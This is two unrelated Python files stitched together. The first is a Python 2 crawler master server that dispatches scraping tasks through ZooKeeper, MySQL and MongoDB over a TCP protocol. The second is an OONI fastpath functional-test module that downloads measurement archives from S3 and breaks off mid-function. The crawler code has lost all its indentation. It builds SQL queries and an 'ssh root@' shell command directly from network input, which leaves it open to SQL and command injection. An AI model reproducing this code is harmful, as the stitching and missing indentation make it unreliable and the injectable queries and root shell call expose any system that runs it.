info = {'0':['www.taobao.com','1'],#
'1':['www.tmall.com','1'],
'2':['www.jd.com','1'],
'3':['www.cnblogs.com','2'],
'4':['blog.csdn.net','2'],
'5':['blog.sina.com.cn','2'],
'6':['blog.51cto.com','2'],
'7':['www.chinanews.com','3'],
'8':['www.chinadaily.com.cn','3'],
'9':['www.eastday.com','3'],
'10':['www.huanqiu.com','3'],
'11':['news.sina.com.cn','3'],
}
info_zk = {'0':['taobao','1'], #
'1':['tmall','1'], #
'2':['jingdong','1'],
'3':['cnblog','2'],
'4':['csdnblog','2'], #
'5':['sinablog','2'],
'6':['ctoblog','2'],
'7':['chinanews','3'],
'8':['chinadaily','3'],
'9':['eastnews','3'],
'10':['huanqiunews','3'],
'11':['sinanews','3'], #
}
state_map = {"5":"continue", "8":"pause", "13":"stop"}
node_map = {}
# MongoDB handles (MongoDB connection handles)
mdb = []
# Data to display
show_data = []
def Saveto_mysql():
ip_list = []
sql = "select * from info"
try:
cur = db1.cursor()
cur.execute(sql)
db1.commit()
result = cur.fetchall()
for field in result:
ip_list.append(field[1])
del result
cur.close()
print ip_list
except Exception, e:
print "Error: %s" % e
num = len(ip_list)  # one MongoDB handle per node listed in the info table
for i in range(num):
tip = ip_list[i].split('.')
db_name = ""
for t in tip:
db_name += t
ip_list[i] = MongoClient(ip_list[i], 27017)
mdb.append(ip_list[i][db_name])
while True:
num = len(mdb)
collections = []
tsql = "select url,keywords,genre from task group by url,keywords,genre"
try:
cur = db1.cursor()
cur.execute(tsql)
db1.commit()
result = cur.fetchall()
for task in result:
print '任务: ', task[0], task[1]
li = []
li.append(task[0])
li.append(task[1])
li.append(task[2])
collections.append(li)
print '当前collection: ', collections
del result
cur.close()
except Exception, e:
print "HP said Error: %s" % e
#sys.exit(0)
print '总collections: ', collections
for i in range(len(collections)):
sum = 0
coll_name = info[collections[i][0]][0]
print '当前任务链接: ', coll_name
if coll_name == 'blog.51cto.com':
coll_name = 'ctoblog'
keywords = collections[i][1]
genre = collections[i][2]
if not keywords:
for j in range(num):
try:
sum += mdb[j][coll_name].count()
except Exception,e:
pass
else:
for j in range(num):
sum += mdb[j][keywords].count()
str_sql = "insert into amount values('"+str(collections[i][0])+"', '"+str(keywords)+"', "+str(sum)+", '"+str(genre)+"', now())"
print str_sql
try:
cur = db1.cursor()
cur.execute(str_sql)
db1.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "Error: %s" % e
sleep(10)
def drop_data(url, keywords):
coll_name = info[url][0]
if not keywords:
print coll_name
print mdb
for client in mdb:
client[coll_name].remove({})
else:
for client in mdb:
client[keywords].remove({})
def send_data(url, keywords):
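# Fill show_data for a display request: pick the Mongo node holding the most
# documents for this task, start at a random offset, and fetch 30 records for
# e-commerce tasks (genre '1') or 4 records for blog/news tasks.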
data_num = []
num = len(mdb)
coll_name = info[url][0]
genre = info[url][1]
# Find the node that has crawled the most data
for i in xrange(num):
data_num.append(mdb[i][coll_name].count())
max_num = max(data_num)
client = mdb[data_num.index(max_num)]
# Sample records starting from a random offset
if max_num > 100:
random_num = random.randint(0, max_num-100)
else:
random_num = 0
if not keywords:
coll = client[coll_name]
else:
coll = client[keywords]
print 'genre: ', genre
# E-commerce sites
if genre == '1':
print "正在获取电商数据......"
# Fetch the requested number of records from the node with the most data
result = coll.find().skip(random_num).limit(30)
for res in result:
show_data.append(res['link'])
show_data.append(res['title'])
show_data.append(res['price'])
show_data.append(res['shop'])
show_data.append(res['shopLink'])
try:
compositeScore = str((float(res['serviceScore'])+float(res['describeScore'])+float(res['logisticsScore']))/3)[:3]
except Exception, e:
compositeScore = '尚未收到评价'
show_data.append(compositeScore)
else:
# Fetch the requested number of records from the node with the most data
print 'i am here'
print coll
result = coll.find().skip(random_num).limit(4)
for res in result:
tdata = "原文链接: " + res['url'] + "\n\n标题: " + res['title'].strip() + "\n\n发布时间: " + res['releaseTime'] + "\n\n类别: " + str(res['sort']) + "\n\n标签: " + str(res['tags']) + "\n\n阅读人数: " + str(res['readnum']) + "\n\n正文: \n\n" + str(res['article']).strip() + "\n\n"
show_data.append(tdata)
show_data.extend(['','','','',''])
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def get_ready_node(self, priority):
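# For each of `priority` rounds, select the working node (status '21') with the
# fewest running tasks that has not already been chosen, and return the list.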
ready_list = []
for i in range(priority):
min_task_num = 9999
for node in node_map:
if node_map[node][1] == '21' and node_map[node][2] < min_task_num and node not in ready_list:
obj_node = node
min_task_num = node_map[node][2]
ready_list.append(obj_node)
return ready_list
def handle(self):
print self.request.getpeername()
while True:
try:
data = self.request.recv(1024)
print data
jdata = json.loads(data)
except Exception, e:
print "正在等待主控发来指令...."
break
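# Protocol: the client sends a JSON array whose first element is
# {"Agreement": <code>, "Content": <payload>}; each branch below answers
# with a JSON-encoded list via sendall().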
# Request the list of currently running tasks (status 5 or 8)
#url+ '' ['1']
if jdata[0]['Agreement'] == '1':
print 'mt请求正在运行任务....'
task = ['1']
sql = "select * from task where status='5' or status='8'"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for res in result:
task.append(res[0])
task.append(res[1])
task.append(res[2])
task.append(res[3])
task.append(res[4].strftime("%Y-%m-%d %H:%M:%S"))
task.append(res[5])
print "$$$"
print task
del result
cur.close()
except Exception, e:
print "get working task SQL Error: %s" % e
try:
print task
print json.dumps(task)
self.request.sendall(json.dumps(task))
except Exception, e:
print "get working task Send error: %s" % e
# Request all tasks (including historical tasks)
elif jdata[0]['Agreement'] == '2':
print 'mt请求所有任务....'
task = ['2']
sql = "select * from task"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
task.append(field[0])
task.append(field[1])
del result
cur.close()
except Exception, e:
print "get all task SQL Error: %s" % e
try:
print task
print json.dumps(task)
self.request.sendall(json.dumps(task))
except Exception, e:
print "get all task Send error: %s" % e
# Request terminated tasks (status 13)
elif jdata[0]['Agreement'] == '3':
print 'mt请求所有任务....'
task = ['3']
sql = "select * from task where status='13'"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
task.append(field[0])
task.append(field[2])
del result
cur.close()
except Exception, e:
print "get end task SQL Error: %s" % e
try:
print task
print json.dumps(task)
self.request.sendall(json.dumps(task))
except Exception, e:
print "get end task Send Error: %s" % e
# Request to start a task covering multiple URLs
elif jdata[0]['Agreement'] == '4':
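# For each URL: pick the `priority` least-loaded nodes, write the task type to
# each node's /command znode, reset /signal/<task_type> and create a 'start'
# marker, then record the task and per-node task counts in MySQL.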
urls = jdata[0]['Content'].split(', ')
print 'urls', urls
priority = int(urls[len(urls)-1])
for i in range(len(urls)-1):
url = str(urls[i])
task_type = info_zk[url][0]
ready_list = self.get_ready_node(priority)
for j in range(priority):
print ready_list[j] + "&&&"
zk.set("/command/" + ready_list[j], value = task_type)
node_map[ready_list[j]][2] += 1 # task_num++
temp_list = zk.get_children("/signal/" + task_type)
for i in temp_list:
zk.delete('/signal/' + task_type + '/' +str(i))
zk.create("/signal/" + task_type + '/start')
for ready_node in ready_list:
sql = "insert into task values('"+url+"','','"+info[url][1]+"',"+ready_node+",now(),'5')"
nsql = "update info set tasknum=tasknum+1 where id='" + ready_node + "'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
except Exception, e:
sql = "update task set status='5' where url='" + url + "' and keywords=''"
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
try:
cur = db2.cursor()
cur.execute(nsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "start task(multi) SQL Error: %s" % e
# After publishing the task, insert 20 empty rows into the amount table to avoid reversed time ordering in the log
tsql = "insert into amount values('"+url+"','',0,'"+info[url][1]+"',now())"
for i in range(20):
try:
cur = db2.cursor()
cur.execute(tsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print 'insert amount(indistinct) execute error: ', e
print priority
print type(priority)
try:
self.request.sendall(json.dumps(["4","0"]))
except Exception, e:
self.request.sendall(json.dumps(["4","-1"]))
print "start task(multi) Send error: %s" % e
# Request to start a precise task (single URL plus keyword)
elif jdata[0]['Agreement'] == '5':
urls = jdata[0]['Content'].split(', ')
print 'urls', urls
url = str(urls[0])
keyword = urls[1]
priority = int(urls[2])
task_type = (info_zk[url][0] + '_' + keyword).decode("utf-8")
ready_list = self.get_ready_node(priority)
for i in range(priority):
zk.set("/command/" + ready_list[i], value = task_type.encode("utf-8"))
node_map[ready_list[i]][2] += 1 # task_num++
if zk.exists("/signal/" + task_type) != None:
temp_list = zk.get_children("/signal/" + task_type)
for i in temp_list:
zk.delete('/signal/' + task_type + '/' +str(i))
else:
zk.create("/signal/" + task_type)
zk.create("/signal/" + task_type + '/start')
for ready_node in ready_list:
print type(keyword)
sql = "insert into task values('"+url+"', '"+keyword+"','"+info[url][1]+"',"+str(ready_node)+",now(),'5')"
nsql = "update info set tasknum=tasknum+1 where id='" + ready_node + "'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
sql = "update task set status='5' where url='" + url + "' and keywords='" + keyword + "'"
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
try:
cur = db2.cursor()
cur.execute(nsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "start task(acc) SQL Error: %s" % e
# After publishing the task, insert 20 empty rows into the amount table to avoid reversed time ordering in the log
tsql = "insert into amount values('"+url+"','"+ keyword+"',0,'"+info[url][1]+"',now())"
for i in range(20):
try:
cur = db2.cursor()
cur.execute(tsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print 'insert amount(accurate) execute error: ', e
try:
self.request.sendall(json.dumps(["5","0"]))
except Exception, e:
self.request.sendall(json.dumps(["5","-1"]))
print "start task(acc) Send error: %s" % e
# Request to run an instant (one-off) crawl task
elif jdata[0]['Agreement'] == '8':
del instant_data[:]
instant_data.append('35')
try:
self.request.sendall(json.dumps(["8","0"]))
except Exception, e:
self.request.sendall(json.dumps(["8","-1"]))
print "start im task Send error: %s" % e
try:
urls = jdata[0]['Content'].split(', ')
for url in urls:
if not url.startswith('http'):
url = "http://" + url
if url.endswith('com') or url.endswith('net'):
url = url + "/"
crawl = Crawler(url)
if re.search('taobao|jiyoujia', url):
instant_data.append(url)
instant_data.append("1")
instant_data.append(str(crawl.spider_taobao()))
elif re.search('tmall', url):
instant_data.append(url)
instant_data.append("1")
instant_data.append(str(crawl.spider_tmall()))
elif re.search('jd.com', url):
instant_data.append(url)
instant_data.append("1")
instant_data.append(str(crawl.spider_jingdong()))
elif re.search('blog.sina', url):
instant_data.append(url)
instant_data.append("0")
instant_data.append(crawl.spider_sinablog())
elif re.search('csdn', url):
instant_data.append(url)
instant_data.append("0")
instant_data.append(crawl.spider_csdnblog())
elif re.search('news.sina', url):
instant_data.append(url)
instant_data.append("0")
instant_data.append(crawl.spider_sinanews())
elif re.search('chinanews', url):
instant_data.append(url)
instant_data.append("0")
instant_data.append(crawl.spider_chinanews())
else:
try:
urllib2.urlopen(url).read()
except Exception:
instant_data.append(url)
instant_data.append("0")
instant_data.append("链接有误,请检查后重新输入!!!")
else:
instant_data.append(url)
instant_data.append("0")
instant_data.append("目前不支持!!!")
print instant_data
except Exception, e:
print "start im task Error: %s" % e
# Change task state (pause, continue, stop)
elif jdata[0]['Agreement'] == '9':
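# Look up the nodes running this task, clear /signal/<task_type> and create a
# child znode named after the new state ("continue"/"pause"/"stop"); on "stop"
# also mark the task finished and decrement each node's task counter in MySQL.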
obj_list = []
data = jdata[0]['Content'].split(',')
sql = "select id from task where url='" + data[0] + "' and keywords='" + data[1] + "'"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
obj_list.append("%010d" % field[0])
del result
cur.close()
except Exception, e:
print "change task state SQL(select) Error: %s" % e
task_state = state_map[str(data[2])]
task_type = info_zk[str(data[0])][0]
task_keyword = str(data[1])
if task_keyword != '':
task_type = task_type + '_' + task_keyword
print task_type
temp_list = zk.get_children("/signal/" + task_type)
for i in temp_list:
zk.delete('/signal/' + task_type + '/' +str(i))
zk.create('/signal/' + task_type + '/' + task_state)
if task_state == "stop":
sql = "update task set status='13' where url='" + data[0] + "' and keywords='" + data[1] + "'"
#sql = "delete from task where url='" + data[0] + "' and keywords='" + data[1] + "'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "change task state SQL(delete) Error: %s" % e
for obj_node in obj_list:
if node_map[obj_node][2] > 0:
node_map[obj_node][2] -= 1
else:
node_map[obj_node][2] = 0
nsql = "update info set tasknum=" + str(node_map[obj_node][2]) + " where id='" + obj_node + "'"
try:
cur = db2.cursor()
cur.execute(nsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "change task state SQL(tasknum--) Error: %s" % e
sql = "update task set status = '"+str(data[2])+"' where url='"+str(data[0])+"' and keywords='" + str(data[1]) + "'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "change task state SQL(update) Error: %s" % e
try:
self.request.sendall(json.dumps(["9","0"]))
except Exception, e:
self.request.sendall(json.dumps(["9","-1"]))
print "change task state Send error: %s" % e
# Request tasks together with their total download counts
elif jdata[0]['Agreement'] == '13':
print 'mt请求任务及下载总数....'
task = ['13']
sql = "select url,keywords,max(total) from amount group by url,keywords"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
task.append(field[0])
task.append(field[1])
task.append(field[2])
del result
cur.close()
except Exception, e:
print "get task amount SQL Error: %s" % e
try:
print task
print json.dumps(task)
self.request.sendall(json.dumps(task))
except Exception, e:
print "get task amount Send error: %s" % e
# Request the data log (recent download counts over time)
elif jdata[0]['Agreement'] == '21':
print '正在查看数据日志'
log = ['21']
data = jdata[0]['Content'].split(', ')
#tsql = "select count(1) from amount"
#cur = db2.cursor()
#cur.execute(tsql)
#num = cur.fetchall()[0][0]
#if num < 10:
# sql = "select * from amount where url='" + str(data[0]) + "' and keywords='" + str(data[1]) + "'"
#else:
#sql = "select * from amount where time in (select time from (select * from amount where url='"+str(data[0])+"' and keywords='"+str(data[1])+"' order by time desc limit 10) as tp)"
sql = "select * from amount where url='"+str(data[0])+"' and keywords='"+str(data[1])+"' order by time desc limit 10"
print sql
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
log.append(field[2])
#log.append(field[4].strftime("%m/%d %H:%M:%S"))
log.append(field[4].strftime("%H:%M:%S"))
print log
del result
cur.close()
except Exception, e:
print "get log SQL Error: %s" % e
try:
self.request.sendall(json.dumps(log))
except Exception, e:
print "get log Send error: %s" % e
# Request total download counts per genre across historical tasks
elif jdata[0]['Agreement'] == '34':
print 'mt请求历史任务下载总数....'
task = ['34']
esql = "select sum(total) from (select url,keywords,genre,max(total) as total from amount where genre='1' group by url,keywords,genre) as tp"
bsql = "select sum(total) from (select url,keywords,genre,max(total) as total from amount where genre='2' group by url,keywords,genre) as tp"
nsql = "select sum(total) from (select url,keywords,genre,max(total) as total from amount where genre='3' group by url,keywords,genre) as tp"
print esql
print bsql
print nsql
try:
cur = db2.cursor()
cur.execute(esql)
db2.commit()
result_esum = cur.fetchall()
cur.execute(bsql)
db2.commit()
result_bsum = cur.fetchall()
cur.execute(nsql)
db2.commit()
result_nsum = cur.fetchall()
if result_esum[0][0] is None:
task.append(0)
else:
task.append(int(result_esum[0][0]))
if result_bsum[0][0] is None:
task.append(0)
else:
task.append(int(result_bsum[0][0]))
if result_nsum[0][0] is None:
task.append(0)
else:
task.append(int(result_nsum[0][0]))
print task
del result_esum
del result_bsum
del result_nsum
cur.close()
except Exception, e:
print "get down data sql Error: %s" % e
try:
print task
print json.dumps(task)
self.request.sendall(json.dumps(task))
except Exception, e:
print "get down data Send error: %s" % e
# Send the instant-task results back to the client
elif jdata[0]['Agreement'] == '35':
try:
if not instant_data:
self.request.sendall(json.dumps(['35']))
else:
self.request.sendall(json.dumps(instant_data))
except Exception, e:
print "send im dataSend error: %s" % e
# Data display request
elif jdata[0]['Agreement'] == '36':
data = jdata[0]["Content"].split(', ')
del show_data[:]
print data
show_data.append('36')
t = threading.Thread(target=send_data, args=(data[0], data[1]))
t.start()
sleep(3)
try:
self.request.sendall(json.dumps(show_data))
except Exception, e:
print "send show_data error: %s" % e
elif jdata[0]['Agreement'] == '55': # refresh node state
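# For every known node: if its /command znode still exists the node is alive
# and marked working ('21'); a node that was working but lost its znode is
# marked dead ('34') and its task count is reset. Then report all node states.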
print 'mt请求从机资源....'
resource_info = ['55']
for node in node_map:
if zk.exists("/command/" + node) != None:
node_map[node][1] = '21' # alive-working
sql = "update info set status='21' where id='" + node + "'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "refresh node SQL Error: %s" % e
elif node_map[node][1] == '21':
node_map[node][1] = '34' # dead
sql = "update info set status='34' where id='" + node + "'"
tsql = "update info set tasknum=0 where id='" + node + "'"
try:
cur = db2.cursor()
cur.execute(sql)
result = cur.fetchall()
del result
cur.execute(tsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "refresh node SQL Error: %s" % e
resource_info.append(node)
resource_info.append(node_map[node][0])
resource_info.append(node_map[node][1])
resource_info.append(node_map[node][2])
try:
print resource_info
print json.dumps(resource_info)
self.request.sendall(json.dumps(resource_info))
except Exception, e:
print "refresh node Send error: %s" % e
elif jdata[0]['Agreement'] == '56': # change node state
data = jdata[0]["Content"].split(',')
sql = "update info set status = '" + data[1] + "' where id = '" + data[0] + "'"
tsql = "update task set status='13' where id='" + data[0] + "'"
#tsql = "delete from task where id='" + data[0] + "'"
if data[1] == '55': # stop a node
zk.set("/command/" + data[0], value = "stop")
zk.delete("/command/" + data[0])
node_map[data[0]][1] = '34' # node is over
node_map[data[0]][2] = 0
else: # start a node
obj_ip = node_map[data[0]][0]
print "^^^^" + data[0]
cmd = "ssh root@{} 'python /root/V3/project/run.py {} 1>log' &".format(obj_ip, "%010d" % int(data[0]))
os.system(cmd)
node_map[data[0]][1] = '21' # node is working
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.execute(tsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "Change node state: %s" % e
try:
self.request.sendall(json.dumps(["56","0"]))
except Exception, e:
self.request.sendall(json.dumps(["56","-1"]))
print "Change node Send error: %s" % e
elif jdata[0]['Agreement'] == '57': # delete / add a node
data = jdata[0]["Content"].split(',')
ip = data[1]
if data[0] == "0": # delete a node
sql = "delete from info where id = '" + data[1] + "'"
# tsql = "update task set status='13' where id='" + data[1] + "'"
node_map.pop(data[1])
try:
cur = db2.cursor()
cur.execute(sql)
#cur.execute(tsql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "delete SQL Error: %s" % e
elif data[0] == "1":
# Append the MongoDB client handle for the new node to the global list
tip = ip.split('.')
db_name = ""
for t in tip:
db_name += t
client = MongoClient(ip, 27017)
mdb.append(client[db_name])
sql = "insert into info values(null,'" + data[1] + "','55',0)"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "add SQL Error: %s" % e
tsql = "select max(id) from info"
try:
cur = db2.cursor()
cur.execute(tsql)
db2.commit()
result = cur.fetchall()
cur.close()
except Exception, e:
print "add-query node: %s" % e
node_name = "%010d" % result[0][0]
node_map[node_name] = list((ip, '55', 0))
del result
try:
self.request.sendall(json.dumps(["57","0"]))
except Exception, e:
self.request.sendall(json.dumps(["57","-1"]))
print "add / delete Send error: %s" % e
# Delete data for a given url/keywords pair
elif jdata[0]['Agreement'] == '89':
data = jdata[0]["Content"].split(',')
sql = "delete from amount where url='"+data[0]+"' and keywords='"+data[1]+"'"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
del result
cur.close()
except Exception, e:
print "delete data SQL Error: %s" % e
# Remove the corresponding MongoDB data in a background thread
mt = threading.Thread(target=drop_data, args=(data[0], data[1]))
mt.start()
try:
self.request.sendall(json.dumps(["89","0"]))
except Exception, e:
self.request.sendall(json.dumps(["89","-1"]))
print "delete data Send error: %s" % e
def sigint_handler(signum, frame):
print 'caught interrupt signal!'
# Load node info from the DB into memory
def mysql_to_memory():
sql = "select * from info"
try:
cur = db2.cursor()
cur.execute(sql)
db2.commit()
result = cur.fetchall()
for field in result:
node_map["%010d" % field[0]] = list((field[1], field[2], field[3]))
del result
cur.close()
except Exception, e:
print "mysql_to_memory SQL Error: %s" % e
if __name__ == "__main__":
signal.signal(signal.SIGINT, sigint_handler)
mysql_to_memory()
HOST, PORT = "172.18.214.188", 8888 # Server IP address and port
SocketServer.TCPServer.allow_reuse_address = True
server = SocketServer.ThreadingTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
print "Server loop running in thread:", server_thread.name
print "waiting for connection....."
# Periodically save crawled-data counts to MySQL
t = threading.Thread(target=Saveto_mysql,args=())
t.start()
server.serve_forever()
|
test_functional.py | """
Simulate feeding from the collectors or cans on S3 using a local can
"""
# Format with black -t py37 -l 110 --fast
from collections import Counter
from datetime import date, timedelta
from pathlib import Path
from unittest.mock import MagicMock
import logging
import os
import time
import ujson
import pytest # debdeps: python3-pytest
import fastpath.core as fp
import fastpath.s3feeder as s3feeder
log = logging.getLogger()
# The fixtures download cans from S3 to a local directory
#
# Use credentials from ~/.aws/config in the block:
# [ooni-data]
# aws_access_key_id = ...
# aws_secret_access_key = ...
#
# Explore bucket from CLI:
# s3cmd ls s3://ooni-data-eu-fra
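#
# A minimal sketch (an assumption, not part of this test suite) of building an
# S3 client with that profile directly via boto3, should s3feeder be bypassed:
#   import boto3
#   s3 = boto3.Session(profile_name="ooni-data").client("s3")
#   s3.list_objects_v2(Bucket="ooni-data", Prefix="canned/2019-10-30/")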
BUCKET_NAME = "ooni-data"
@pytest.fixture
def cans():
"""Download interesting cans from S3 to a local directory"""
# TODO: move to the more flexible s3msmts where possible
_cans = dict(
web_conn_it="2018-05-07/20180501T071932Z-IT-AS198471-web_connectivity-20180506T090836Z_AS198471_gKqEpbg0Ny30ldGCQockbZMJSg9HhFiSizjey5e6JxSEHvzm7j-0.2.0-probe.json.lz4",
web_conn_cn="2018-05-07/20180506T014008Z-CN-AS4134-web_connectivity-20180506T014010Z_AS4134_ZpxhAVt3iqCjT5bW5CfJspbqUcfO4oZfzDVjCWAu2UuVkibFsv-0.2.0-probe.json.lz4",
web_conn_30="2019-10-30/web_connectivity.00.tar.lz4",
telegram="2019-08-29/telegram.0.tar.lz4",
whatsapp="2019-08-29/whatsapp.0.tar.lz4",
facebook_messenger="2019-08-29/facebook_messenger.0.tar.lz4",
facebook_messenger2="2019-10-29/facebook_messenger.0.tar.lz4",
# telegram="2019-08-29/20190829T105210Z-IR-AS31549-telegram-20190829T105214Z_AS31549_t32ZZ5av3B6yNruRIFhCnuT1dHTnwPk7vwIa9F0TAe064HG4tk-0.2.0-probe.json",
# fb="2019-06-27/20190627T214121Z-ET-AS24757-facebook_messenger-20190627T214126Z_AS24757_h8g9P5kTmmzyX1VyOjqcVonIbFNujm84l2leMCwC2gX3BI78fI-0.2.0-probe.json",
hhfm_2019_10_26="2019-10-26/http_header_field_manipulation.0.tar.lz4",
hhfm_2019_10_27="2019-10-27/http_header_field_manipulation.0.tar.lz4",
hhfm_2019_10_28="2019-10-28/http_header_field_manipulation.0.tar.lz4",
hhfm_2019_10_29="2019-10-29/http_header_field_manipulation.0.tar.lz4",
tor_2018_10_26="2018-10-26/vanilla_tor.0.tar.lz4",
tor_2019_10_26="2019-10-26/vanilla_tor.0.tar.lz4",
tor_2019_10_27="2019-10-27/vanilla_tor.0.tar.lz4",
tor_2019_10_28="2019-10-28/vanilla_tor.0.tar.lz4",
tor_2019_10_29="2019-10-29/vanilla_tor.0.tar.lz4",
ndt_2018_10_26="2018-10-26/ndt.0.tar.lz4",
tcp_connect_2018_10_26="2018-10-26/tcp_connect.0.tar.lz4",
dash_2019_10_26="2019-10-26/dash.0.tar.lz4",
dash_2019_10_27="2019-10-27/dash.0.tar.lz4",
dash_2019_10_28="2019-10-28/dash.0.tar.lz4",
dash_2019_10_29="2019-10-29/dash.0.tar.lz4",
meek_2019_10_26="2019-10-26/meek_fronted_requests_test.0.tar.lz4",
meek_2019_10_27="2019-10-27/meek_fronted_requests_test.0.tar.lz4",
meek_2019_10_28="2019-10-28/meek_fronted_requests_test.0.tar.lz4",
meek_2019_10_29="2019-10-29/meek_fronted_requests_test.0.tar.lz4",
big2858="2019-10-30/20191030T032301Z-BR-AS28573-web_connectivity-20191030T032303Z_AS28573_VzW6UrXrs21YjYWvlk1hyzRqnKlmKNsSntSBGqFCnzFVxVSLQf-0.2.0-probe.json.lz4",
)
for k, v in _cans.items():
_cans[k] = Path("testdata") / v
to_dload = sorted(f for f in _cans.values() if not f.is_file())
if not to_dload:
return _cans
s3 = s3feeder.create_s3_client()
for fn in to_dload:
s3fname = fn.as_posix().replace("testdata", "canned")
r = s3.list_objects_v2(Bucket=BUCKET_NAME, Prefix=s3fname)
assert r["KeyCount"] == 1, fn
assert r["KeyCount"] == 1, r
filedesc = r["Contents"][0]
size = filedesc["Size"]
print("Downloading can %s size %d MB" % (fn, size / 1024 / 1024))
os.makedirs(os.path.dirname(fn), exist_ok=True)
with open(fn, "wb") as f:
s3.download_fileobj(BUCKET_NAME, s3fname, f)
assert size == os.path.getsize(fn)
return _cans
def s3msmts(test_name, start_date=date(2018, 1, 1), end_date=date(2019, 11, 4)):
"""Fetches cans from S3 and iterates over measurements.
Detects broken downloads.
"""
s3 = s3feeder.create_s3_client()
can_date = start_date
tpl = "{}/{}.00.tar.lz4" if test_name == "web_connectivity" else "{}/{}.0.tar.lz4"
while can_date <= end_date:
# e.g. 2019-10-30/psiphon.0.tar.lz4
can_fname = tpl.format(can_date.strftime("%Y-%m-%d"), test_name)
can_date += timedelta(days=1)
can_local_file = Path("testdata") / can_fname
s3fname = "canned/" + can_fname
r = s3.list_objects_v2(Bucket=BUCKET_NAME, Prefix=s3fname)
if r["KeyCount"] != 1:
log.info("Can %s not found. Skipping." % s3fname)
continue
s3size = r["Contents"][0]["Size"]
assert s3size > 0
ready = can_local_file.is_file() and (can_local_file.stat().st_size == s3size)
if not ready:
# Download can
log.debug("Downloading can %s of size %d MB" % (can_fname, s3size / 1024 / 1024))
can_local_file.parent.mkdir(exist_ok=True)
with can_local_file.open("wb") as f:
s3.download_fileobj(BUCKET_NAME, s3fname, f)
assert s3size == can_local_file.stat().st_size
log.debug("Loading %s", s3fname)
for msm_jstr, msm, _ in s3feeder.load_multiple(can_local_file.as_posix()):
msm = msm or ujson.loads(msm_jstr)
if msm.get("report_id", None) is None:
# Missing or empty report_id
# https://github.com/ooni/probe-engine/pull/104
continue
yield can_fname, msm
def minicans(test_name, start_date: date, end_date: date, end=None):
"""Fetches minicans from S3 and iterates over measurements.
Detects broken downloads.
"""
s3 = s3feeder.create_s3_client()
day = start_date
file_cnt = 0
while day <= end_date:
tn_filter = set([test_name.replace("_", "")])
log.info(day)
li = s3feeder.list_minicans_on_s3_for_a_day(s3, day, None, tn_filter)
for s3fname, s3size in li:
# s3fname: raw/20210426/23/YE/ndt/2021042623_YE_ndt.n0.0.tar.gz
local_file = Path("testdata") / "mini" / s3fname
in_cache = local_file.is_file() and (local_file.stat().st_size == s3size)
if not in_cache:
# Download minican
log.debug("Downloading can %s of size %d KB" % (s3fname, s3size / 1024))
local_file.parent.mkdir(parents=True, exist_ok=True)
with local_file.open("wb") as f:
s3.download_fileobj(s3feeder.MC_BUCKET_NAME, s3fname, f)
assert s3size == local_file.stat().st_size
log.debug("Loading %s", s3fname)
for msm_jstr, msm, _ in s3feeder.load_multiple(local_file.as_posix()):
msm = msm or ujson.loads(msm_jstr)
yield local_file.as_posix(), msm
file_cnt += 1
if end is not None and file_cnt == end:
return
def list_cans_on_s3_for_a_day(day, filter=None, bysize=False):
s3 = s3feeder.create_s3_client()
fns = s3feeder.list_cans_on_s3_for_a_day(s3, day)
if bysize:
fns = sorted(fns, key=lambda i: i[1])
else:
fns = sorted(fns)
for fn, size in fns:
size = size / float(2 ** 20)
if filter is None or (filter in fn):
print(f"{fn:<160} {size} MB")
def disabled_test_list_cans():
"""Used for debugging"""
f = None # "psiphon"
for d in range(30, 31):
list_cans_on_s3_for_a_day("2019-10-{}".format(d), filter=f, bysize=1)
assert 0
def log_obj(o):
log.info(ujson.dumps(o, sort_keys=True, ensure_ascii=False, indent=2))
def _print_msm_node(n, depth=0):
ind = " " * depth
if isinstance(n, list):
for cnt, i in enumerate(n):
print("{}{}>".format(ind, cnt))
_print_msm_node(i, depth + 1)
elif isinstance(n, dict):
for k in sorted(n):
v = n[k]
if k == "body":
print("{}{}".format(ind, "body: ..."))
# elif k == "tor_log":
# print("{}{}".format(ind, "tor_log: ..."))
elif isinstance(v, list) or isinstance(v, dict):
print("{}{}:".format(ind, k))
_print_msm_node(n[k], depth + 1)
else:
print("{}{}: {}".format(ind, k, v))
else:
print(ind, n)
def print_msm(msm):
"""Used for debugging"""
print("--msmt--")
if "report_id" in msm:
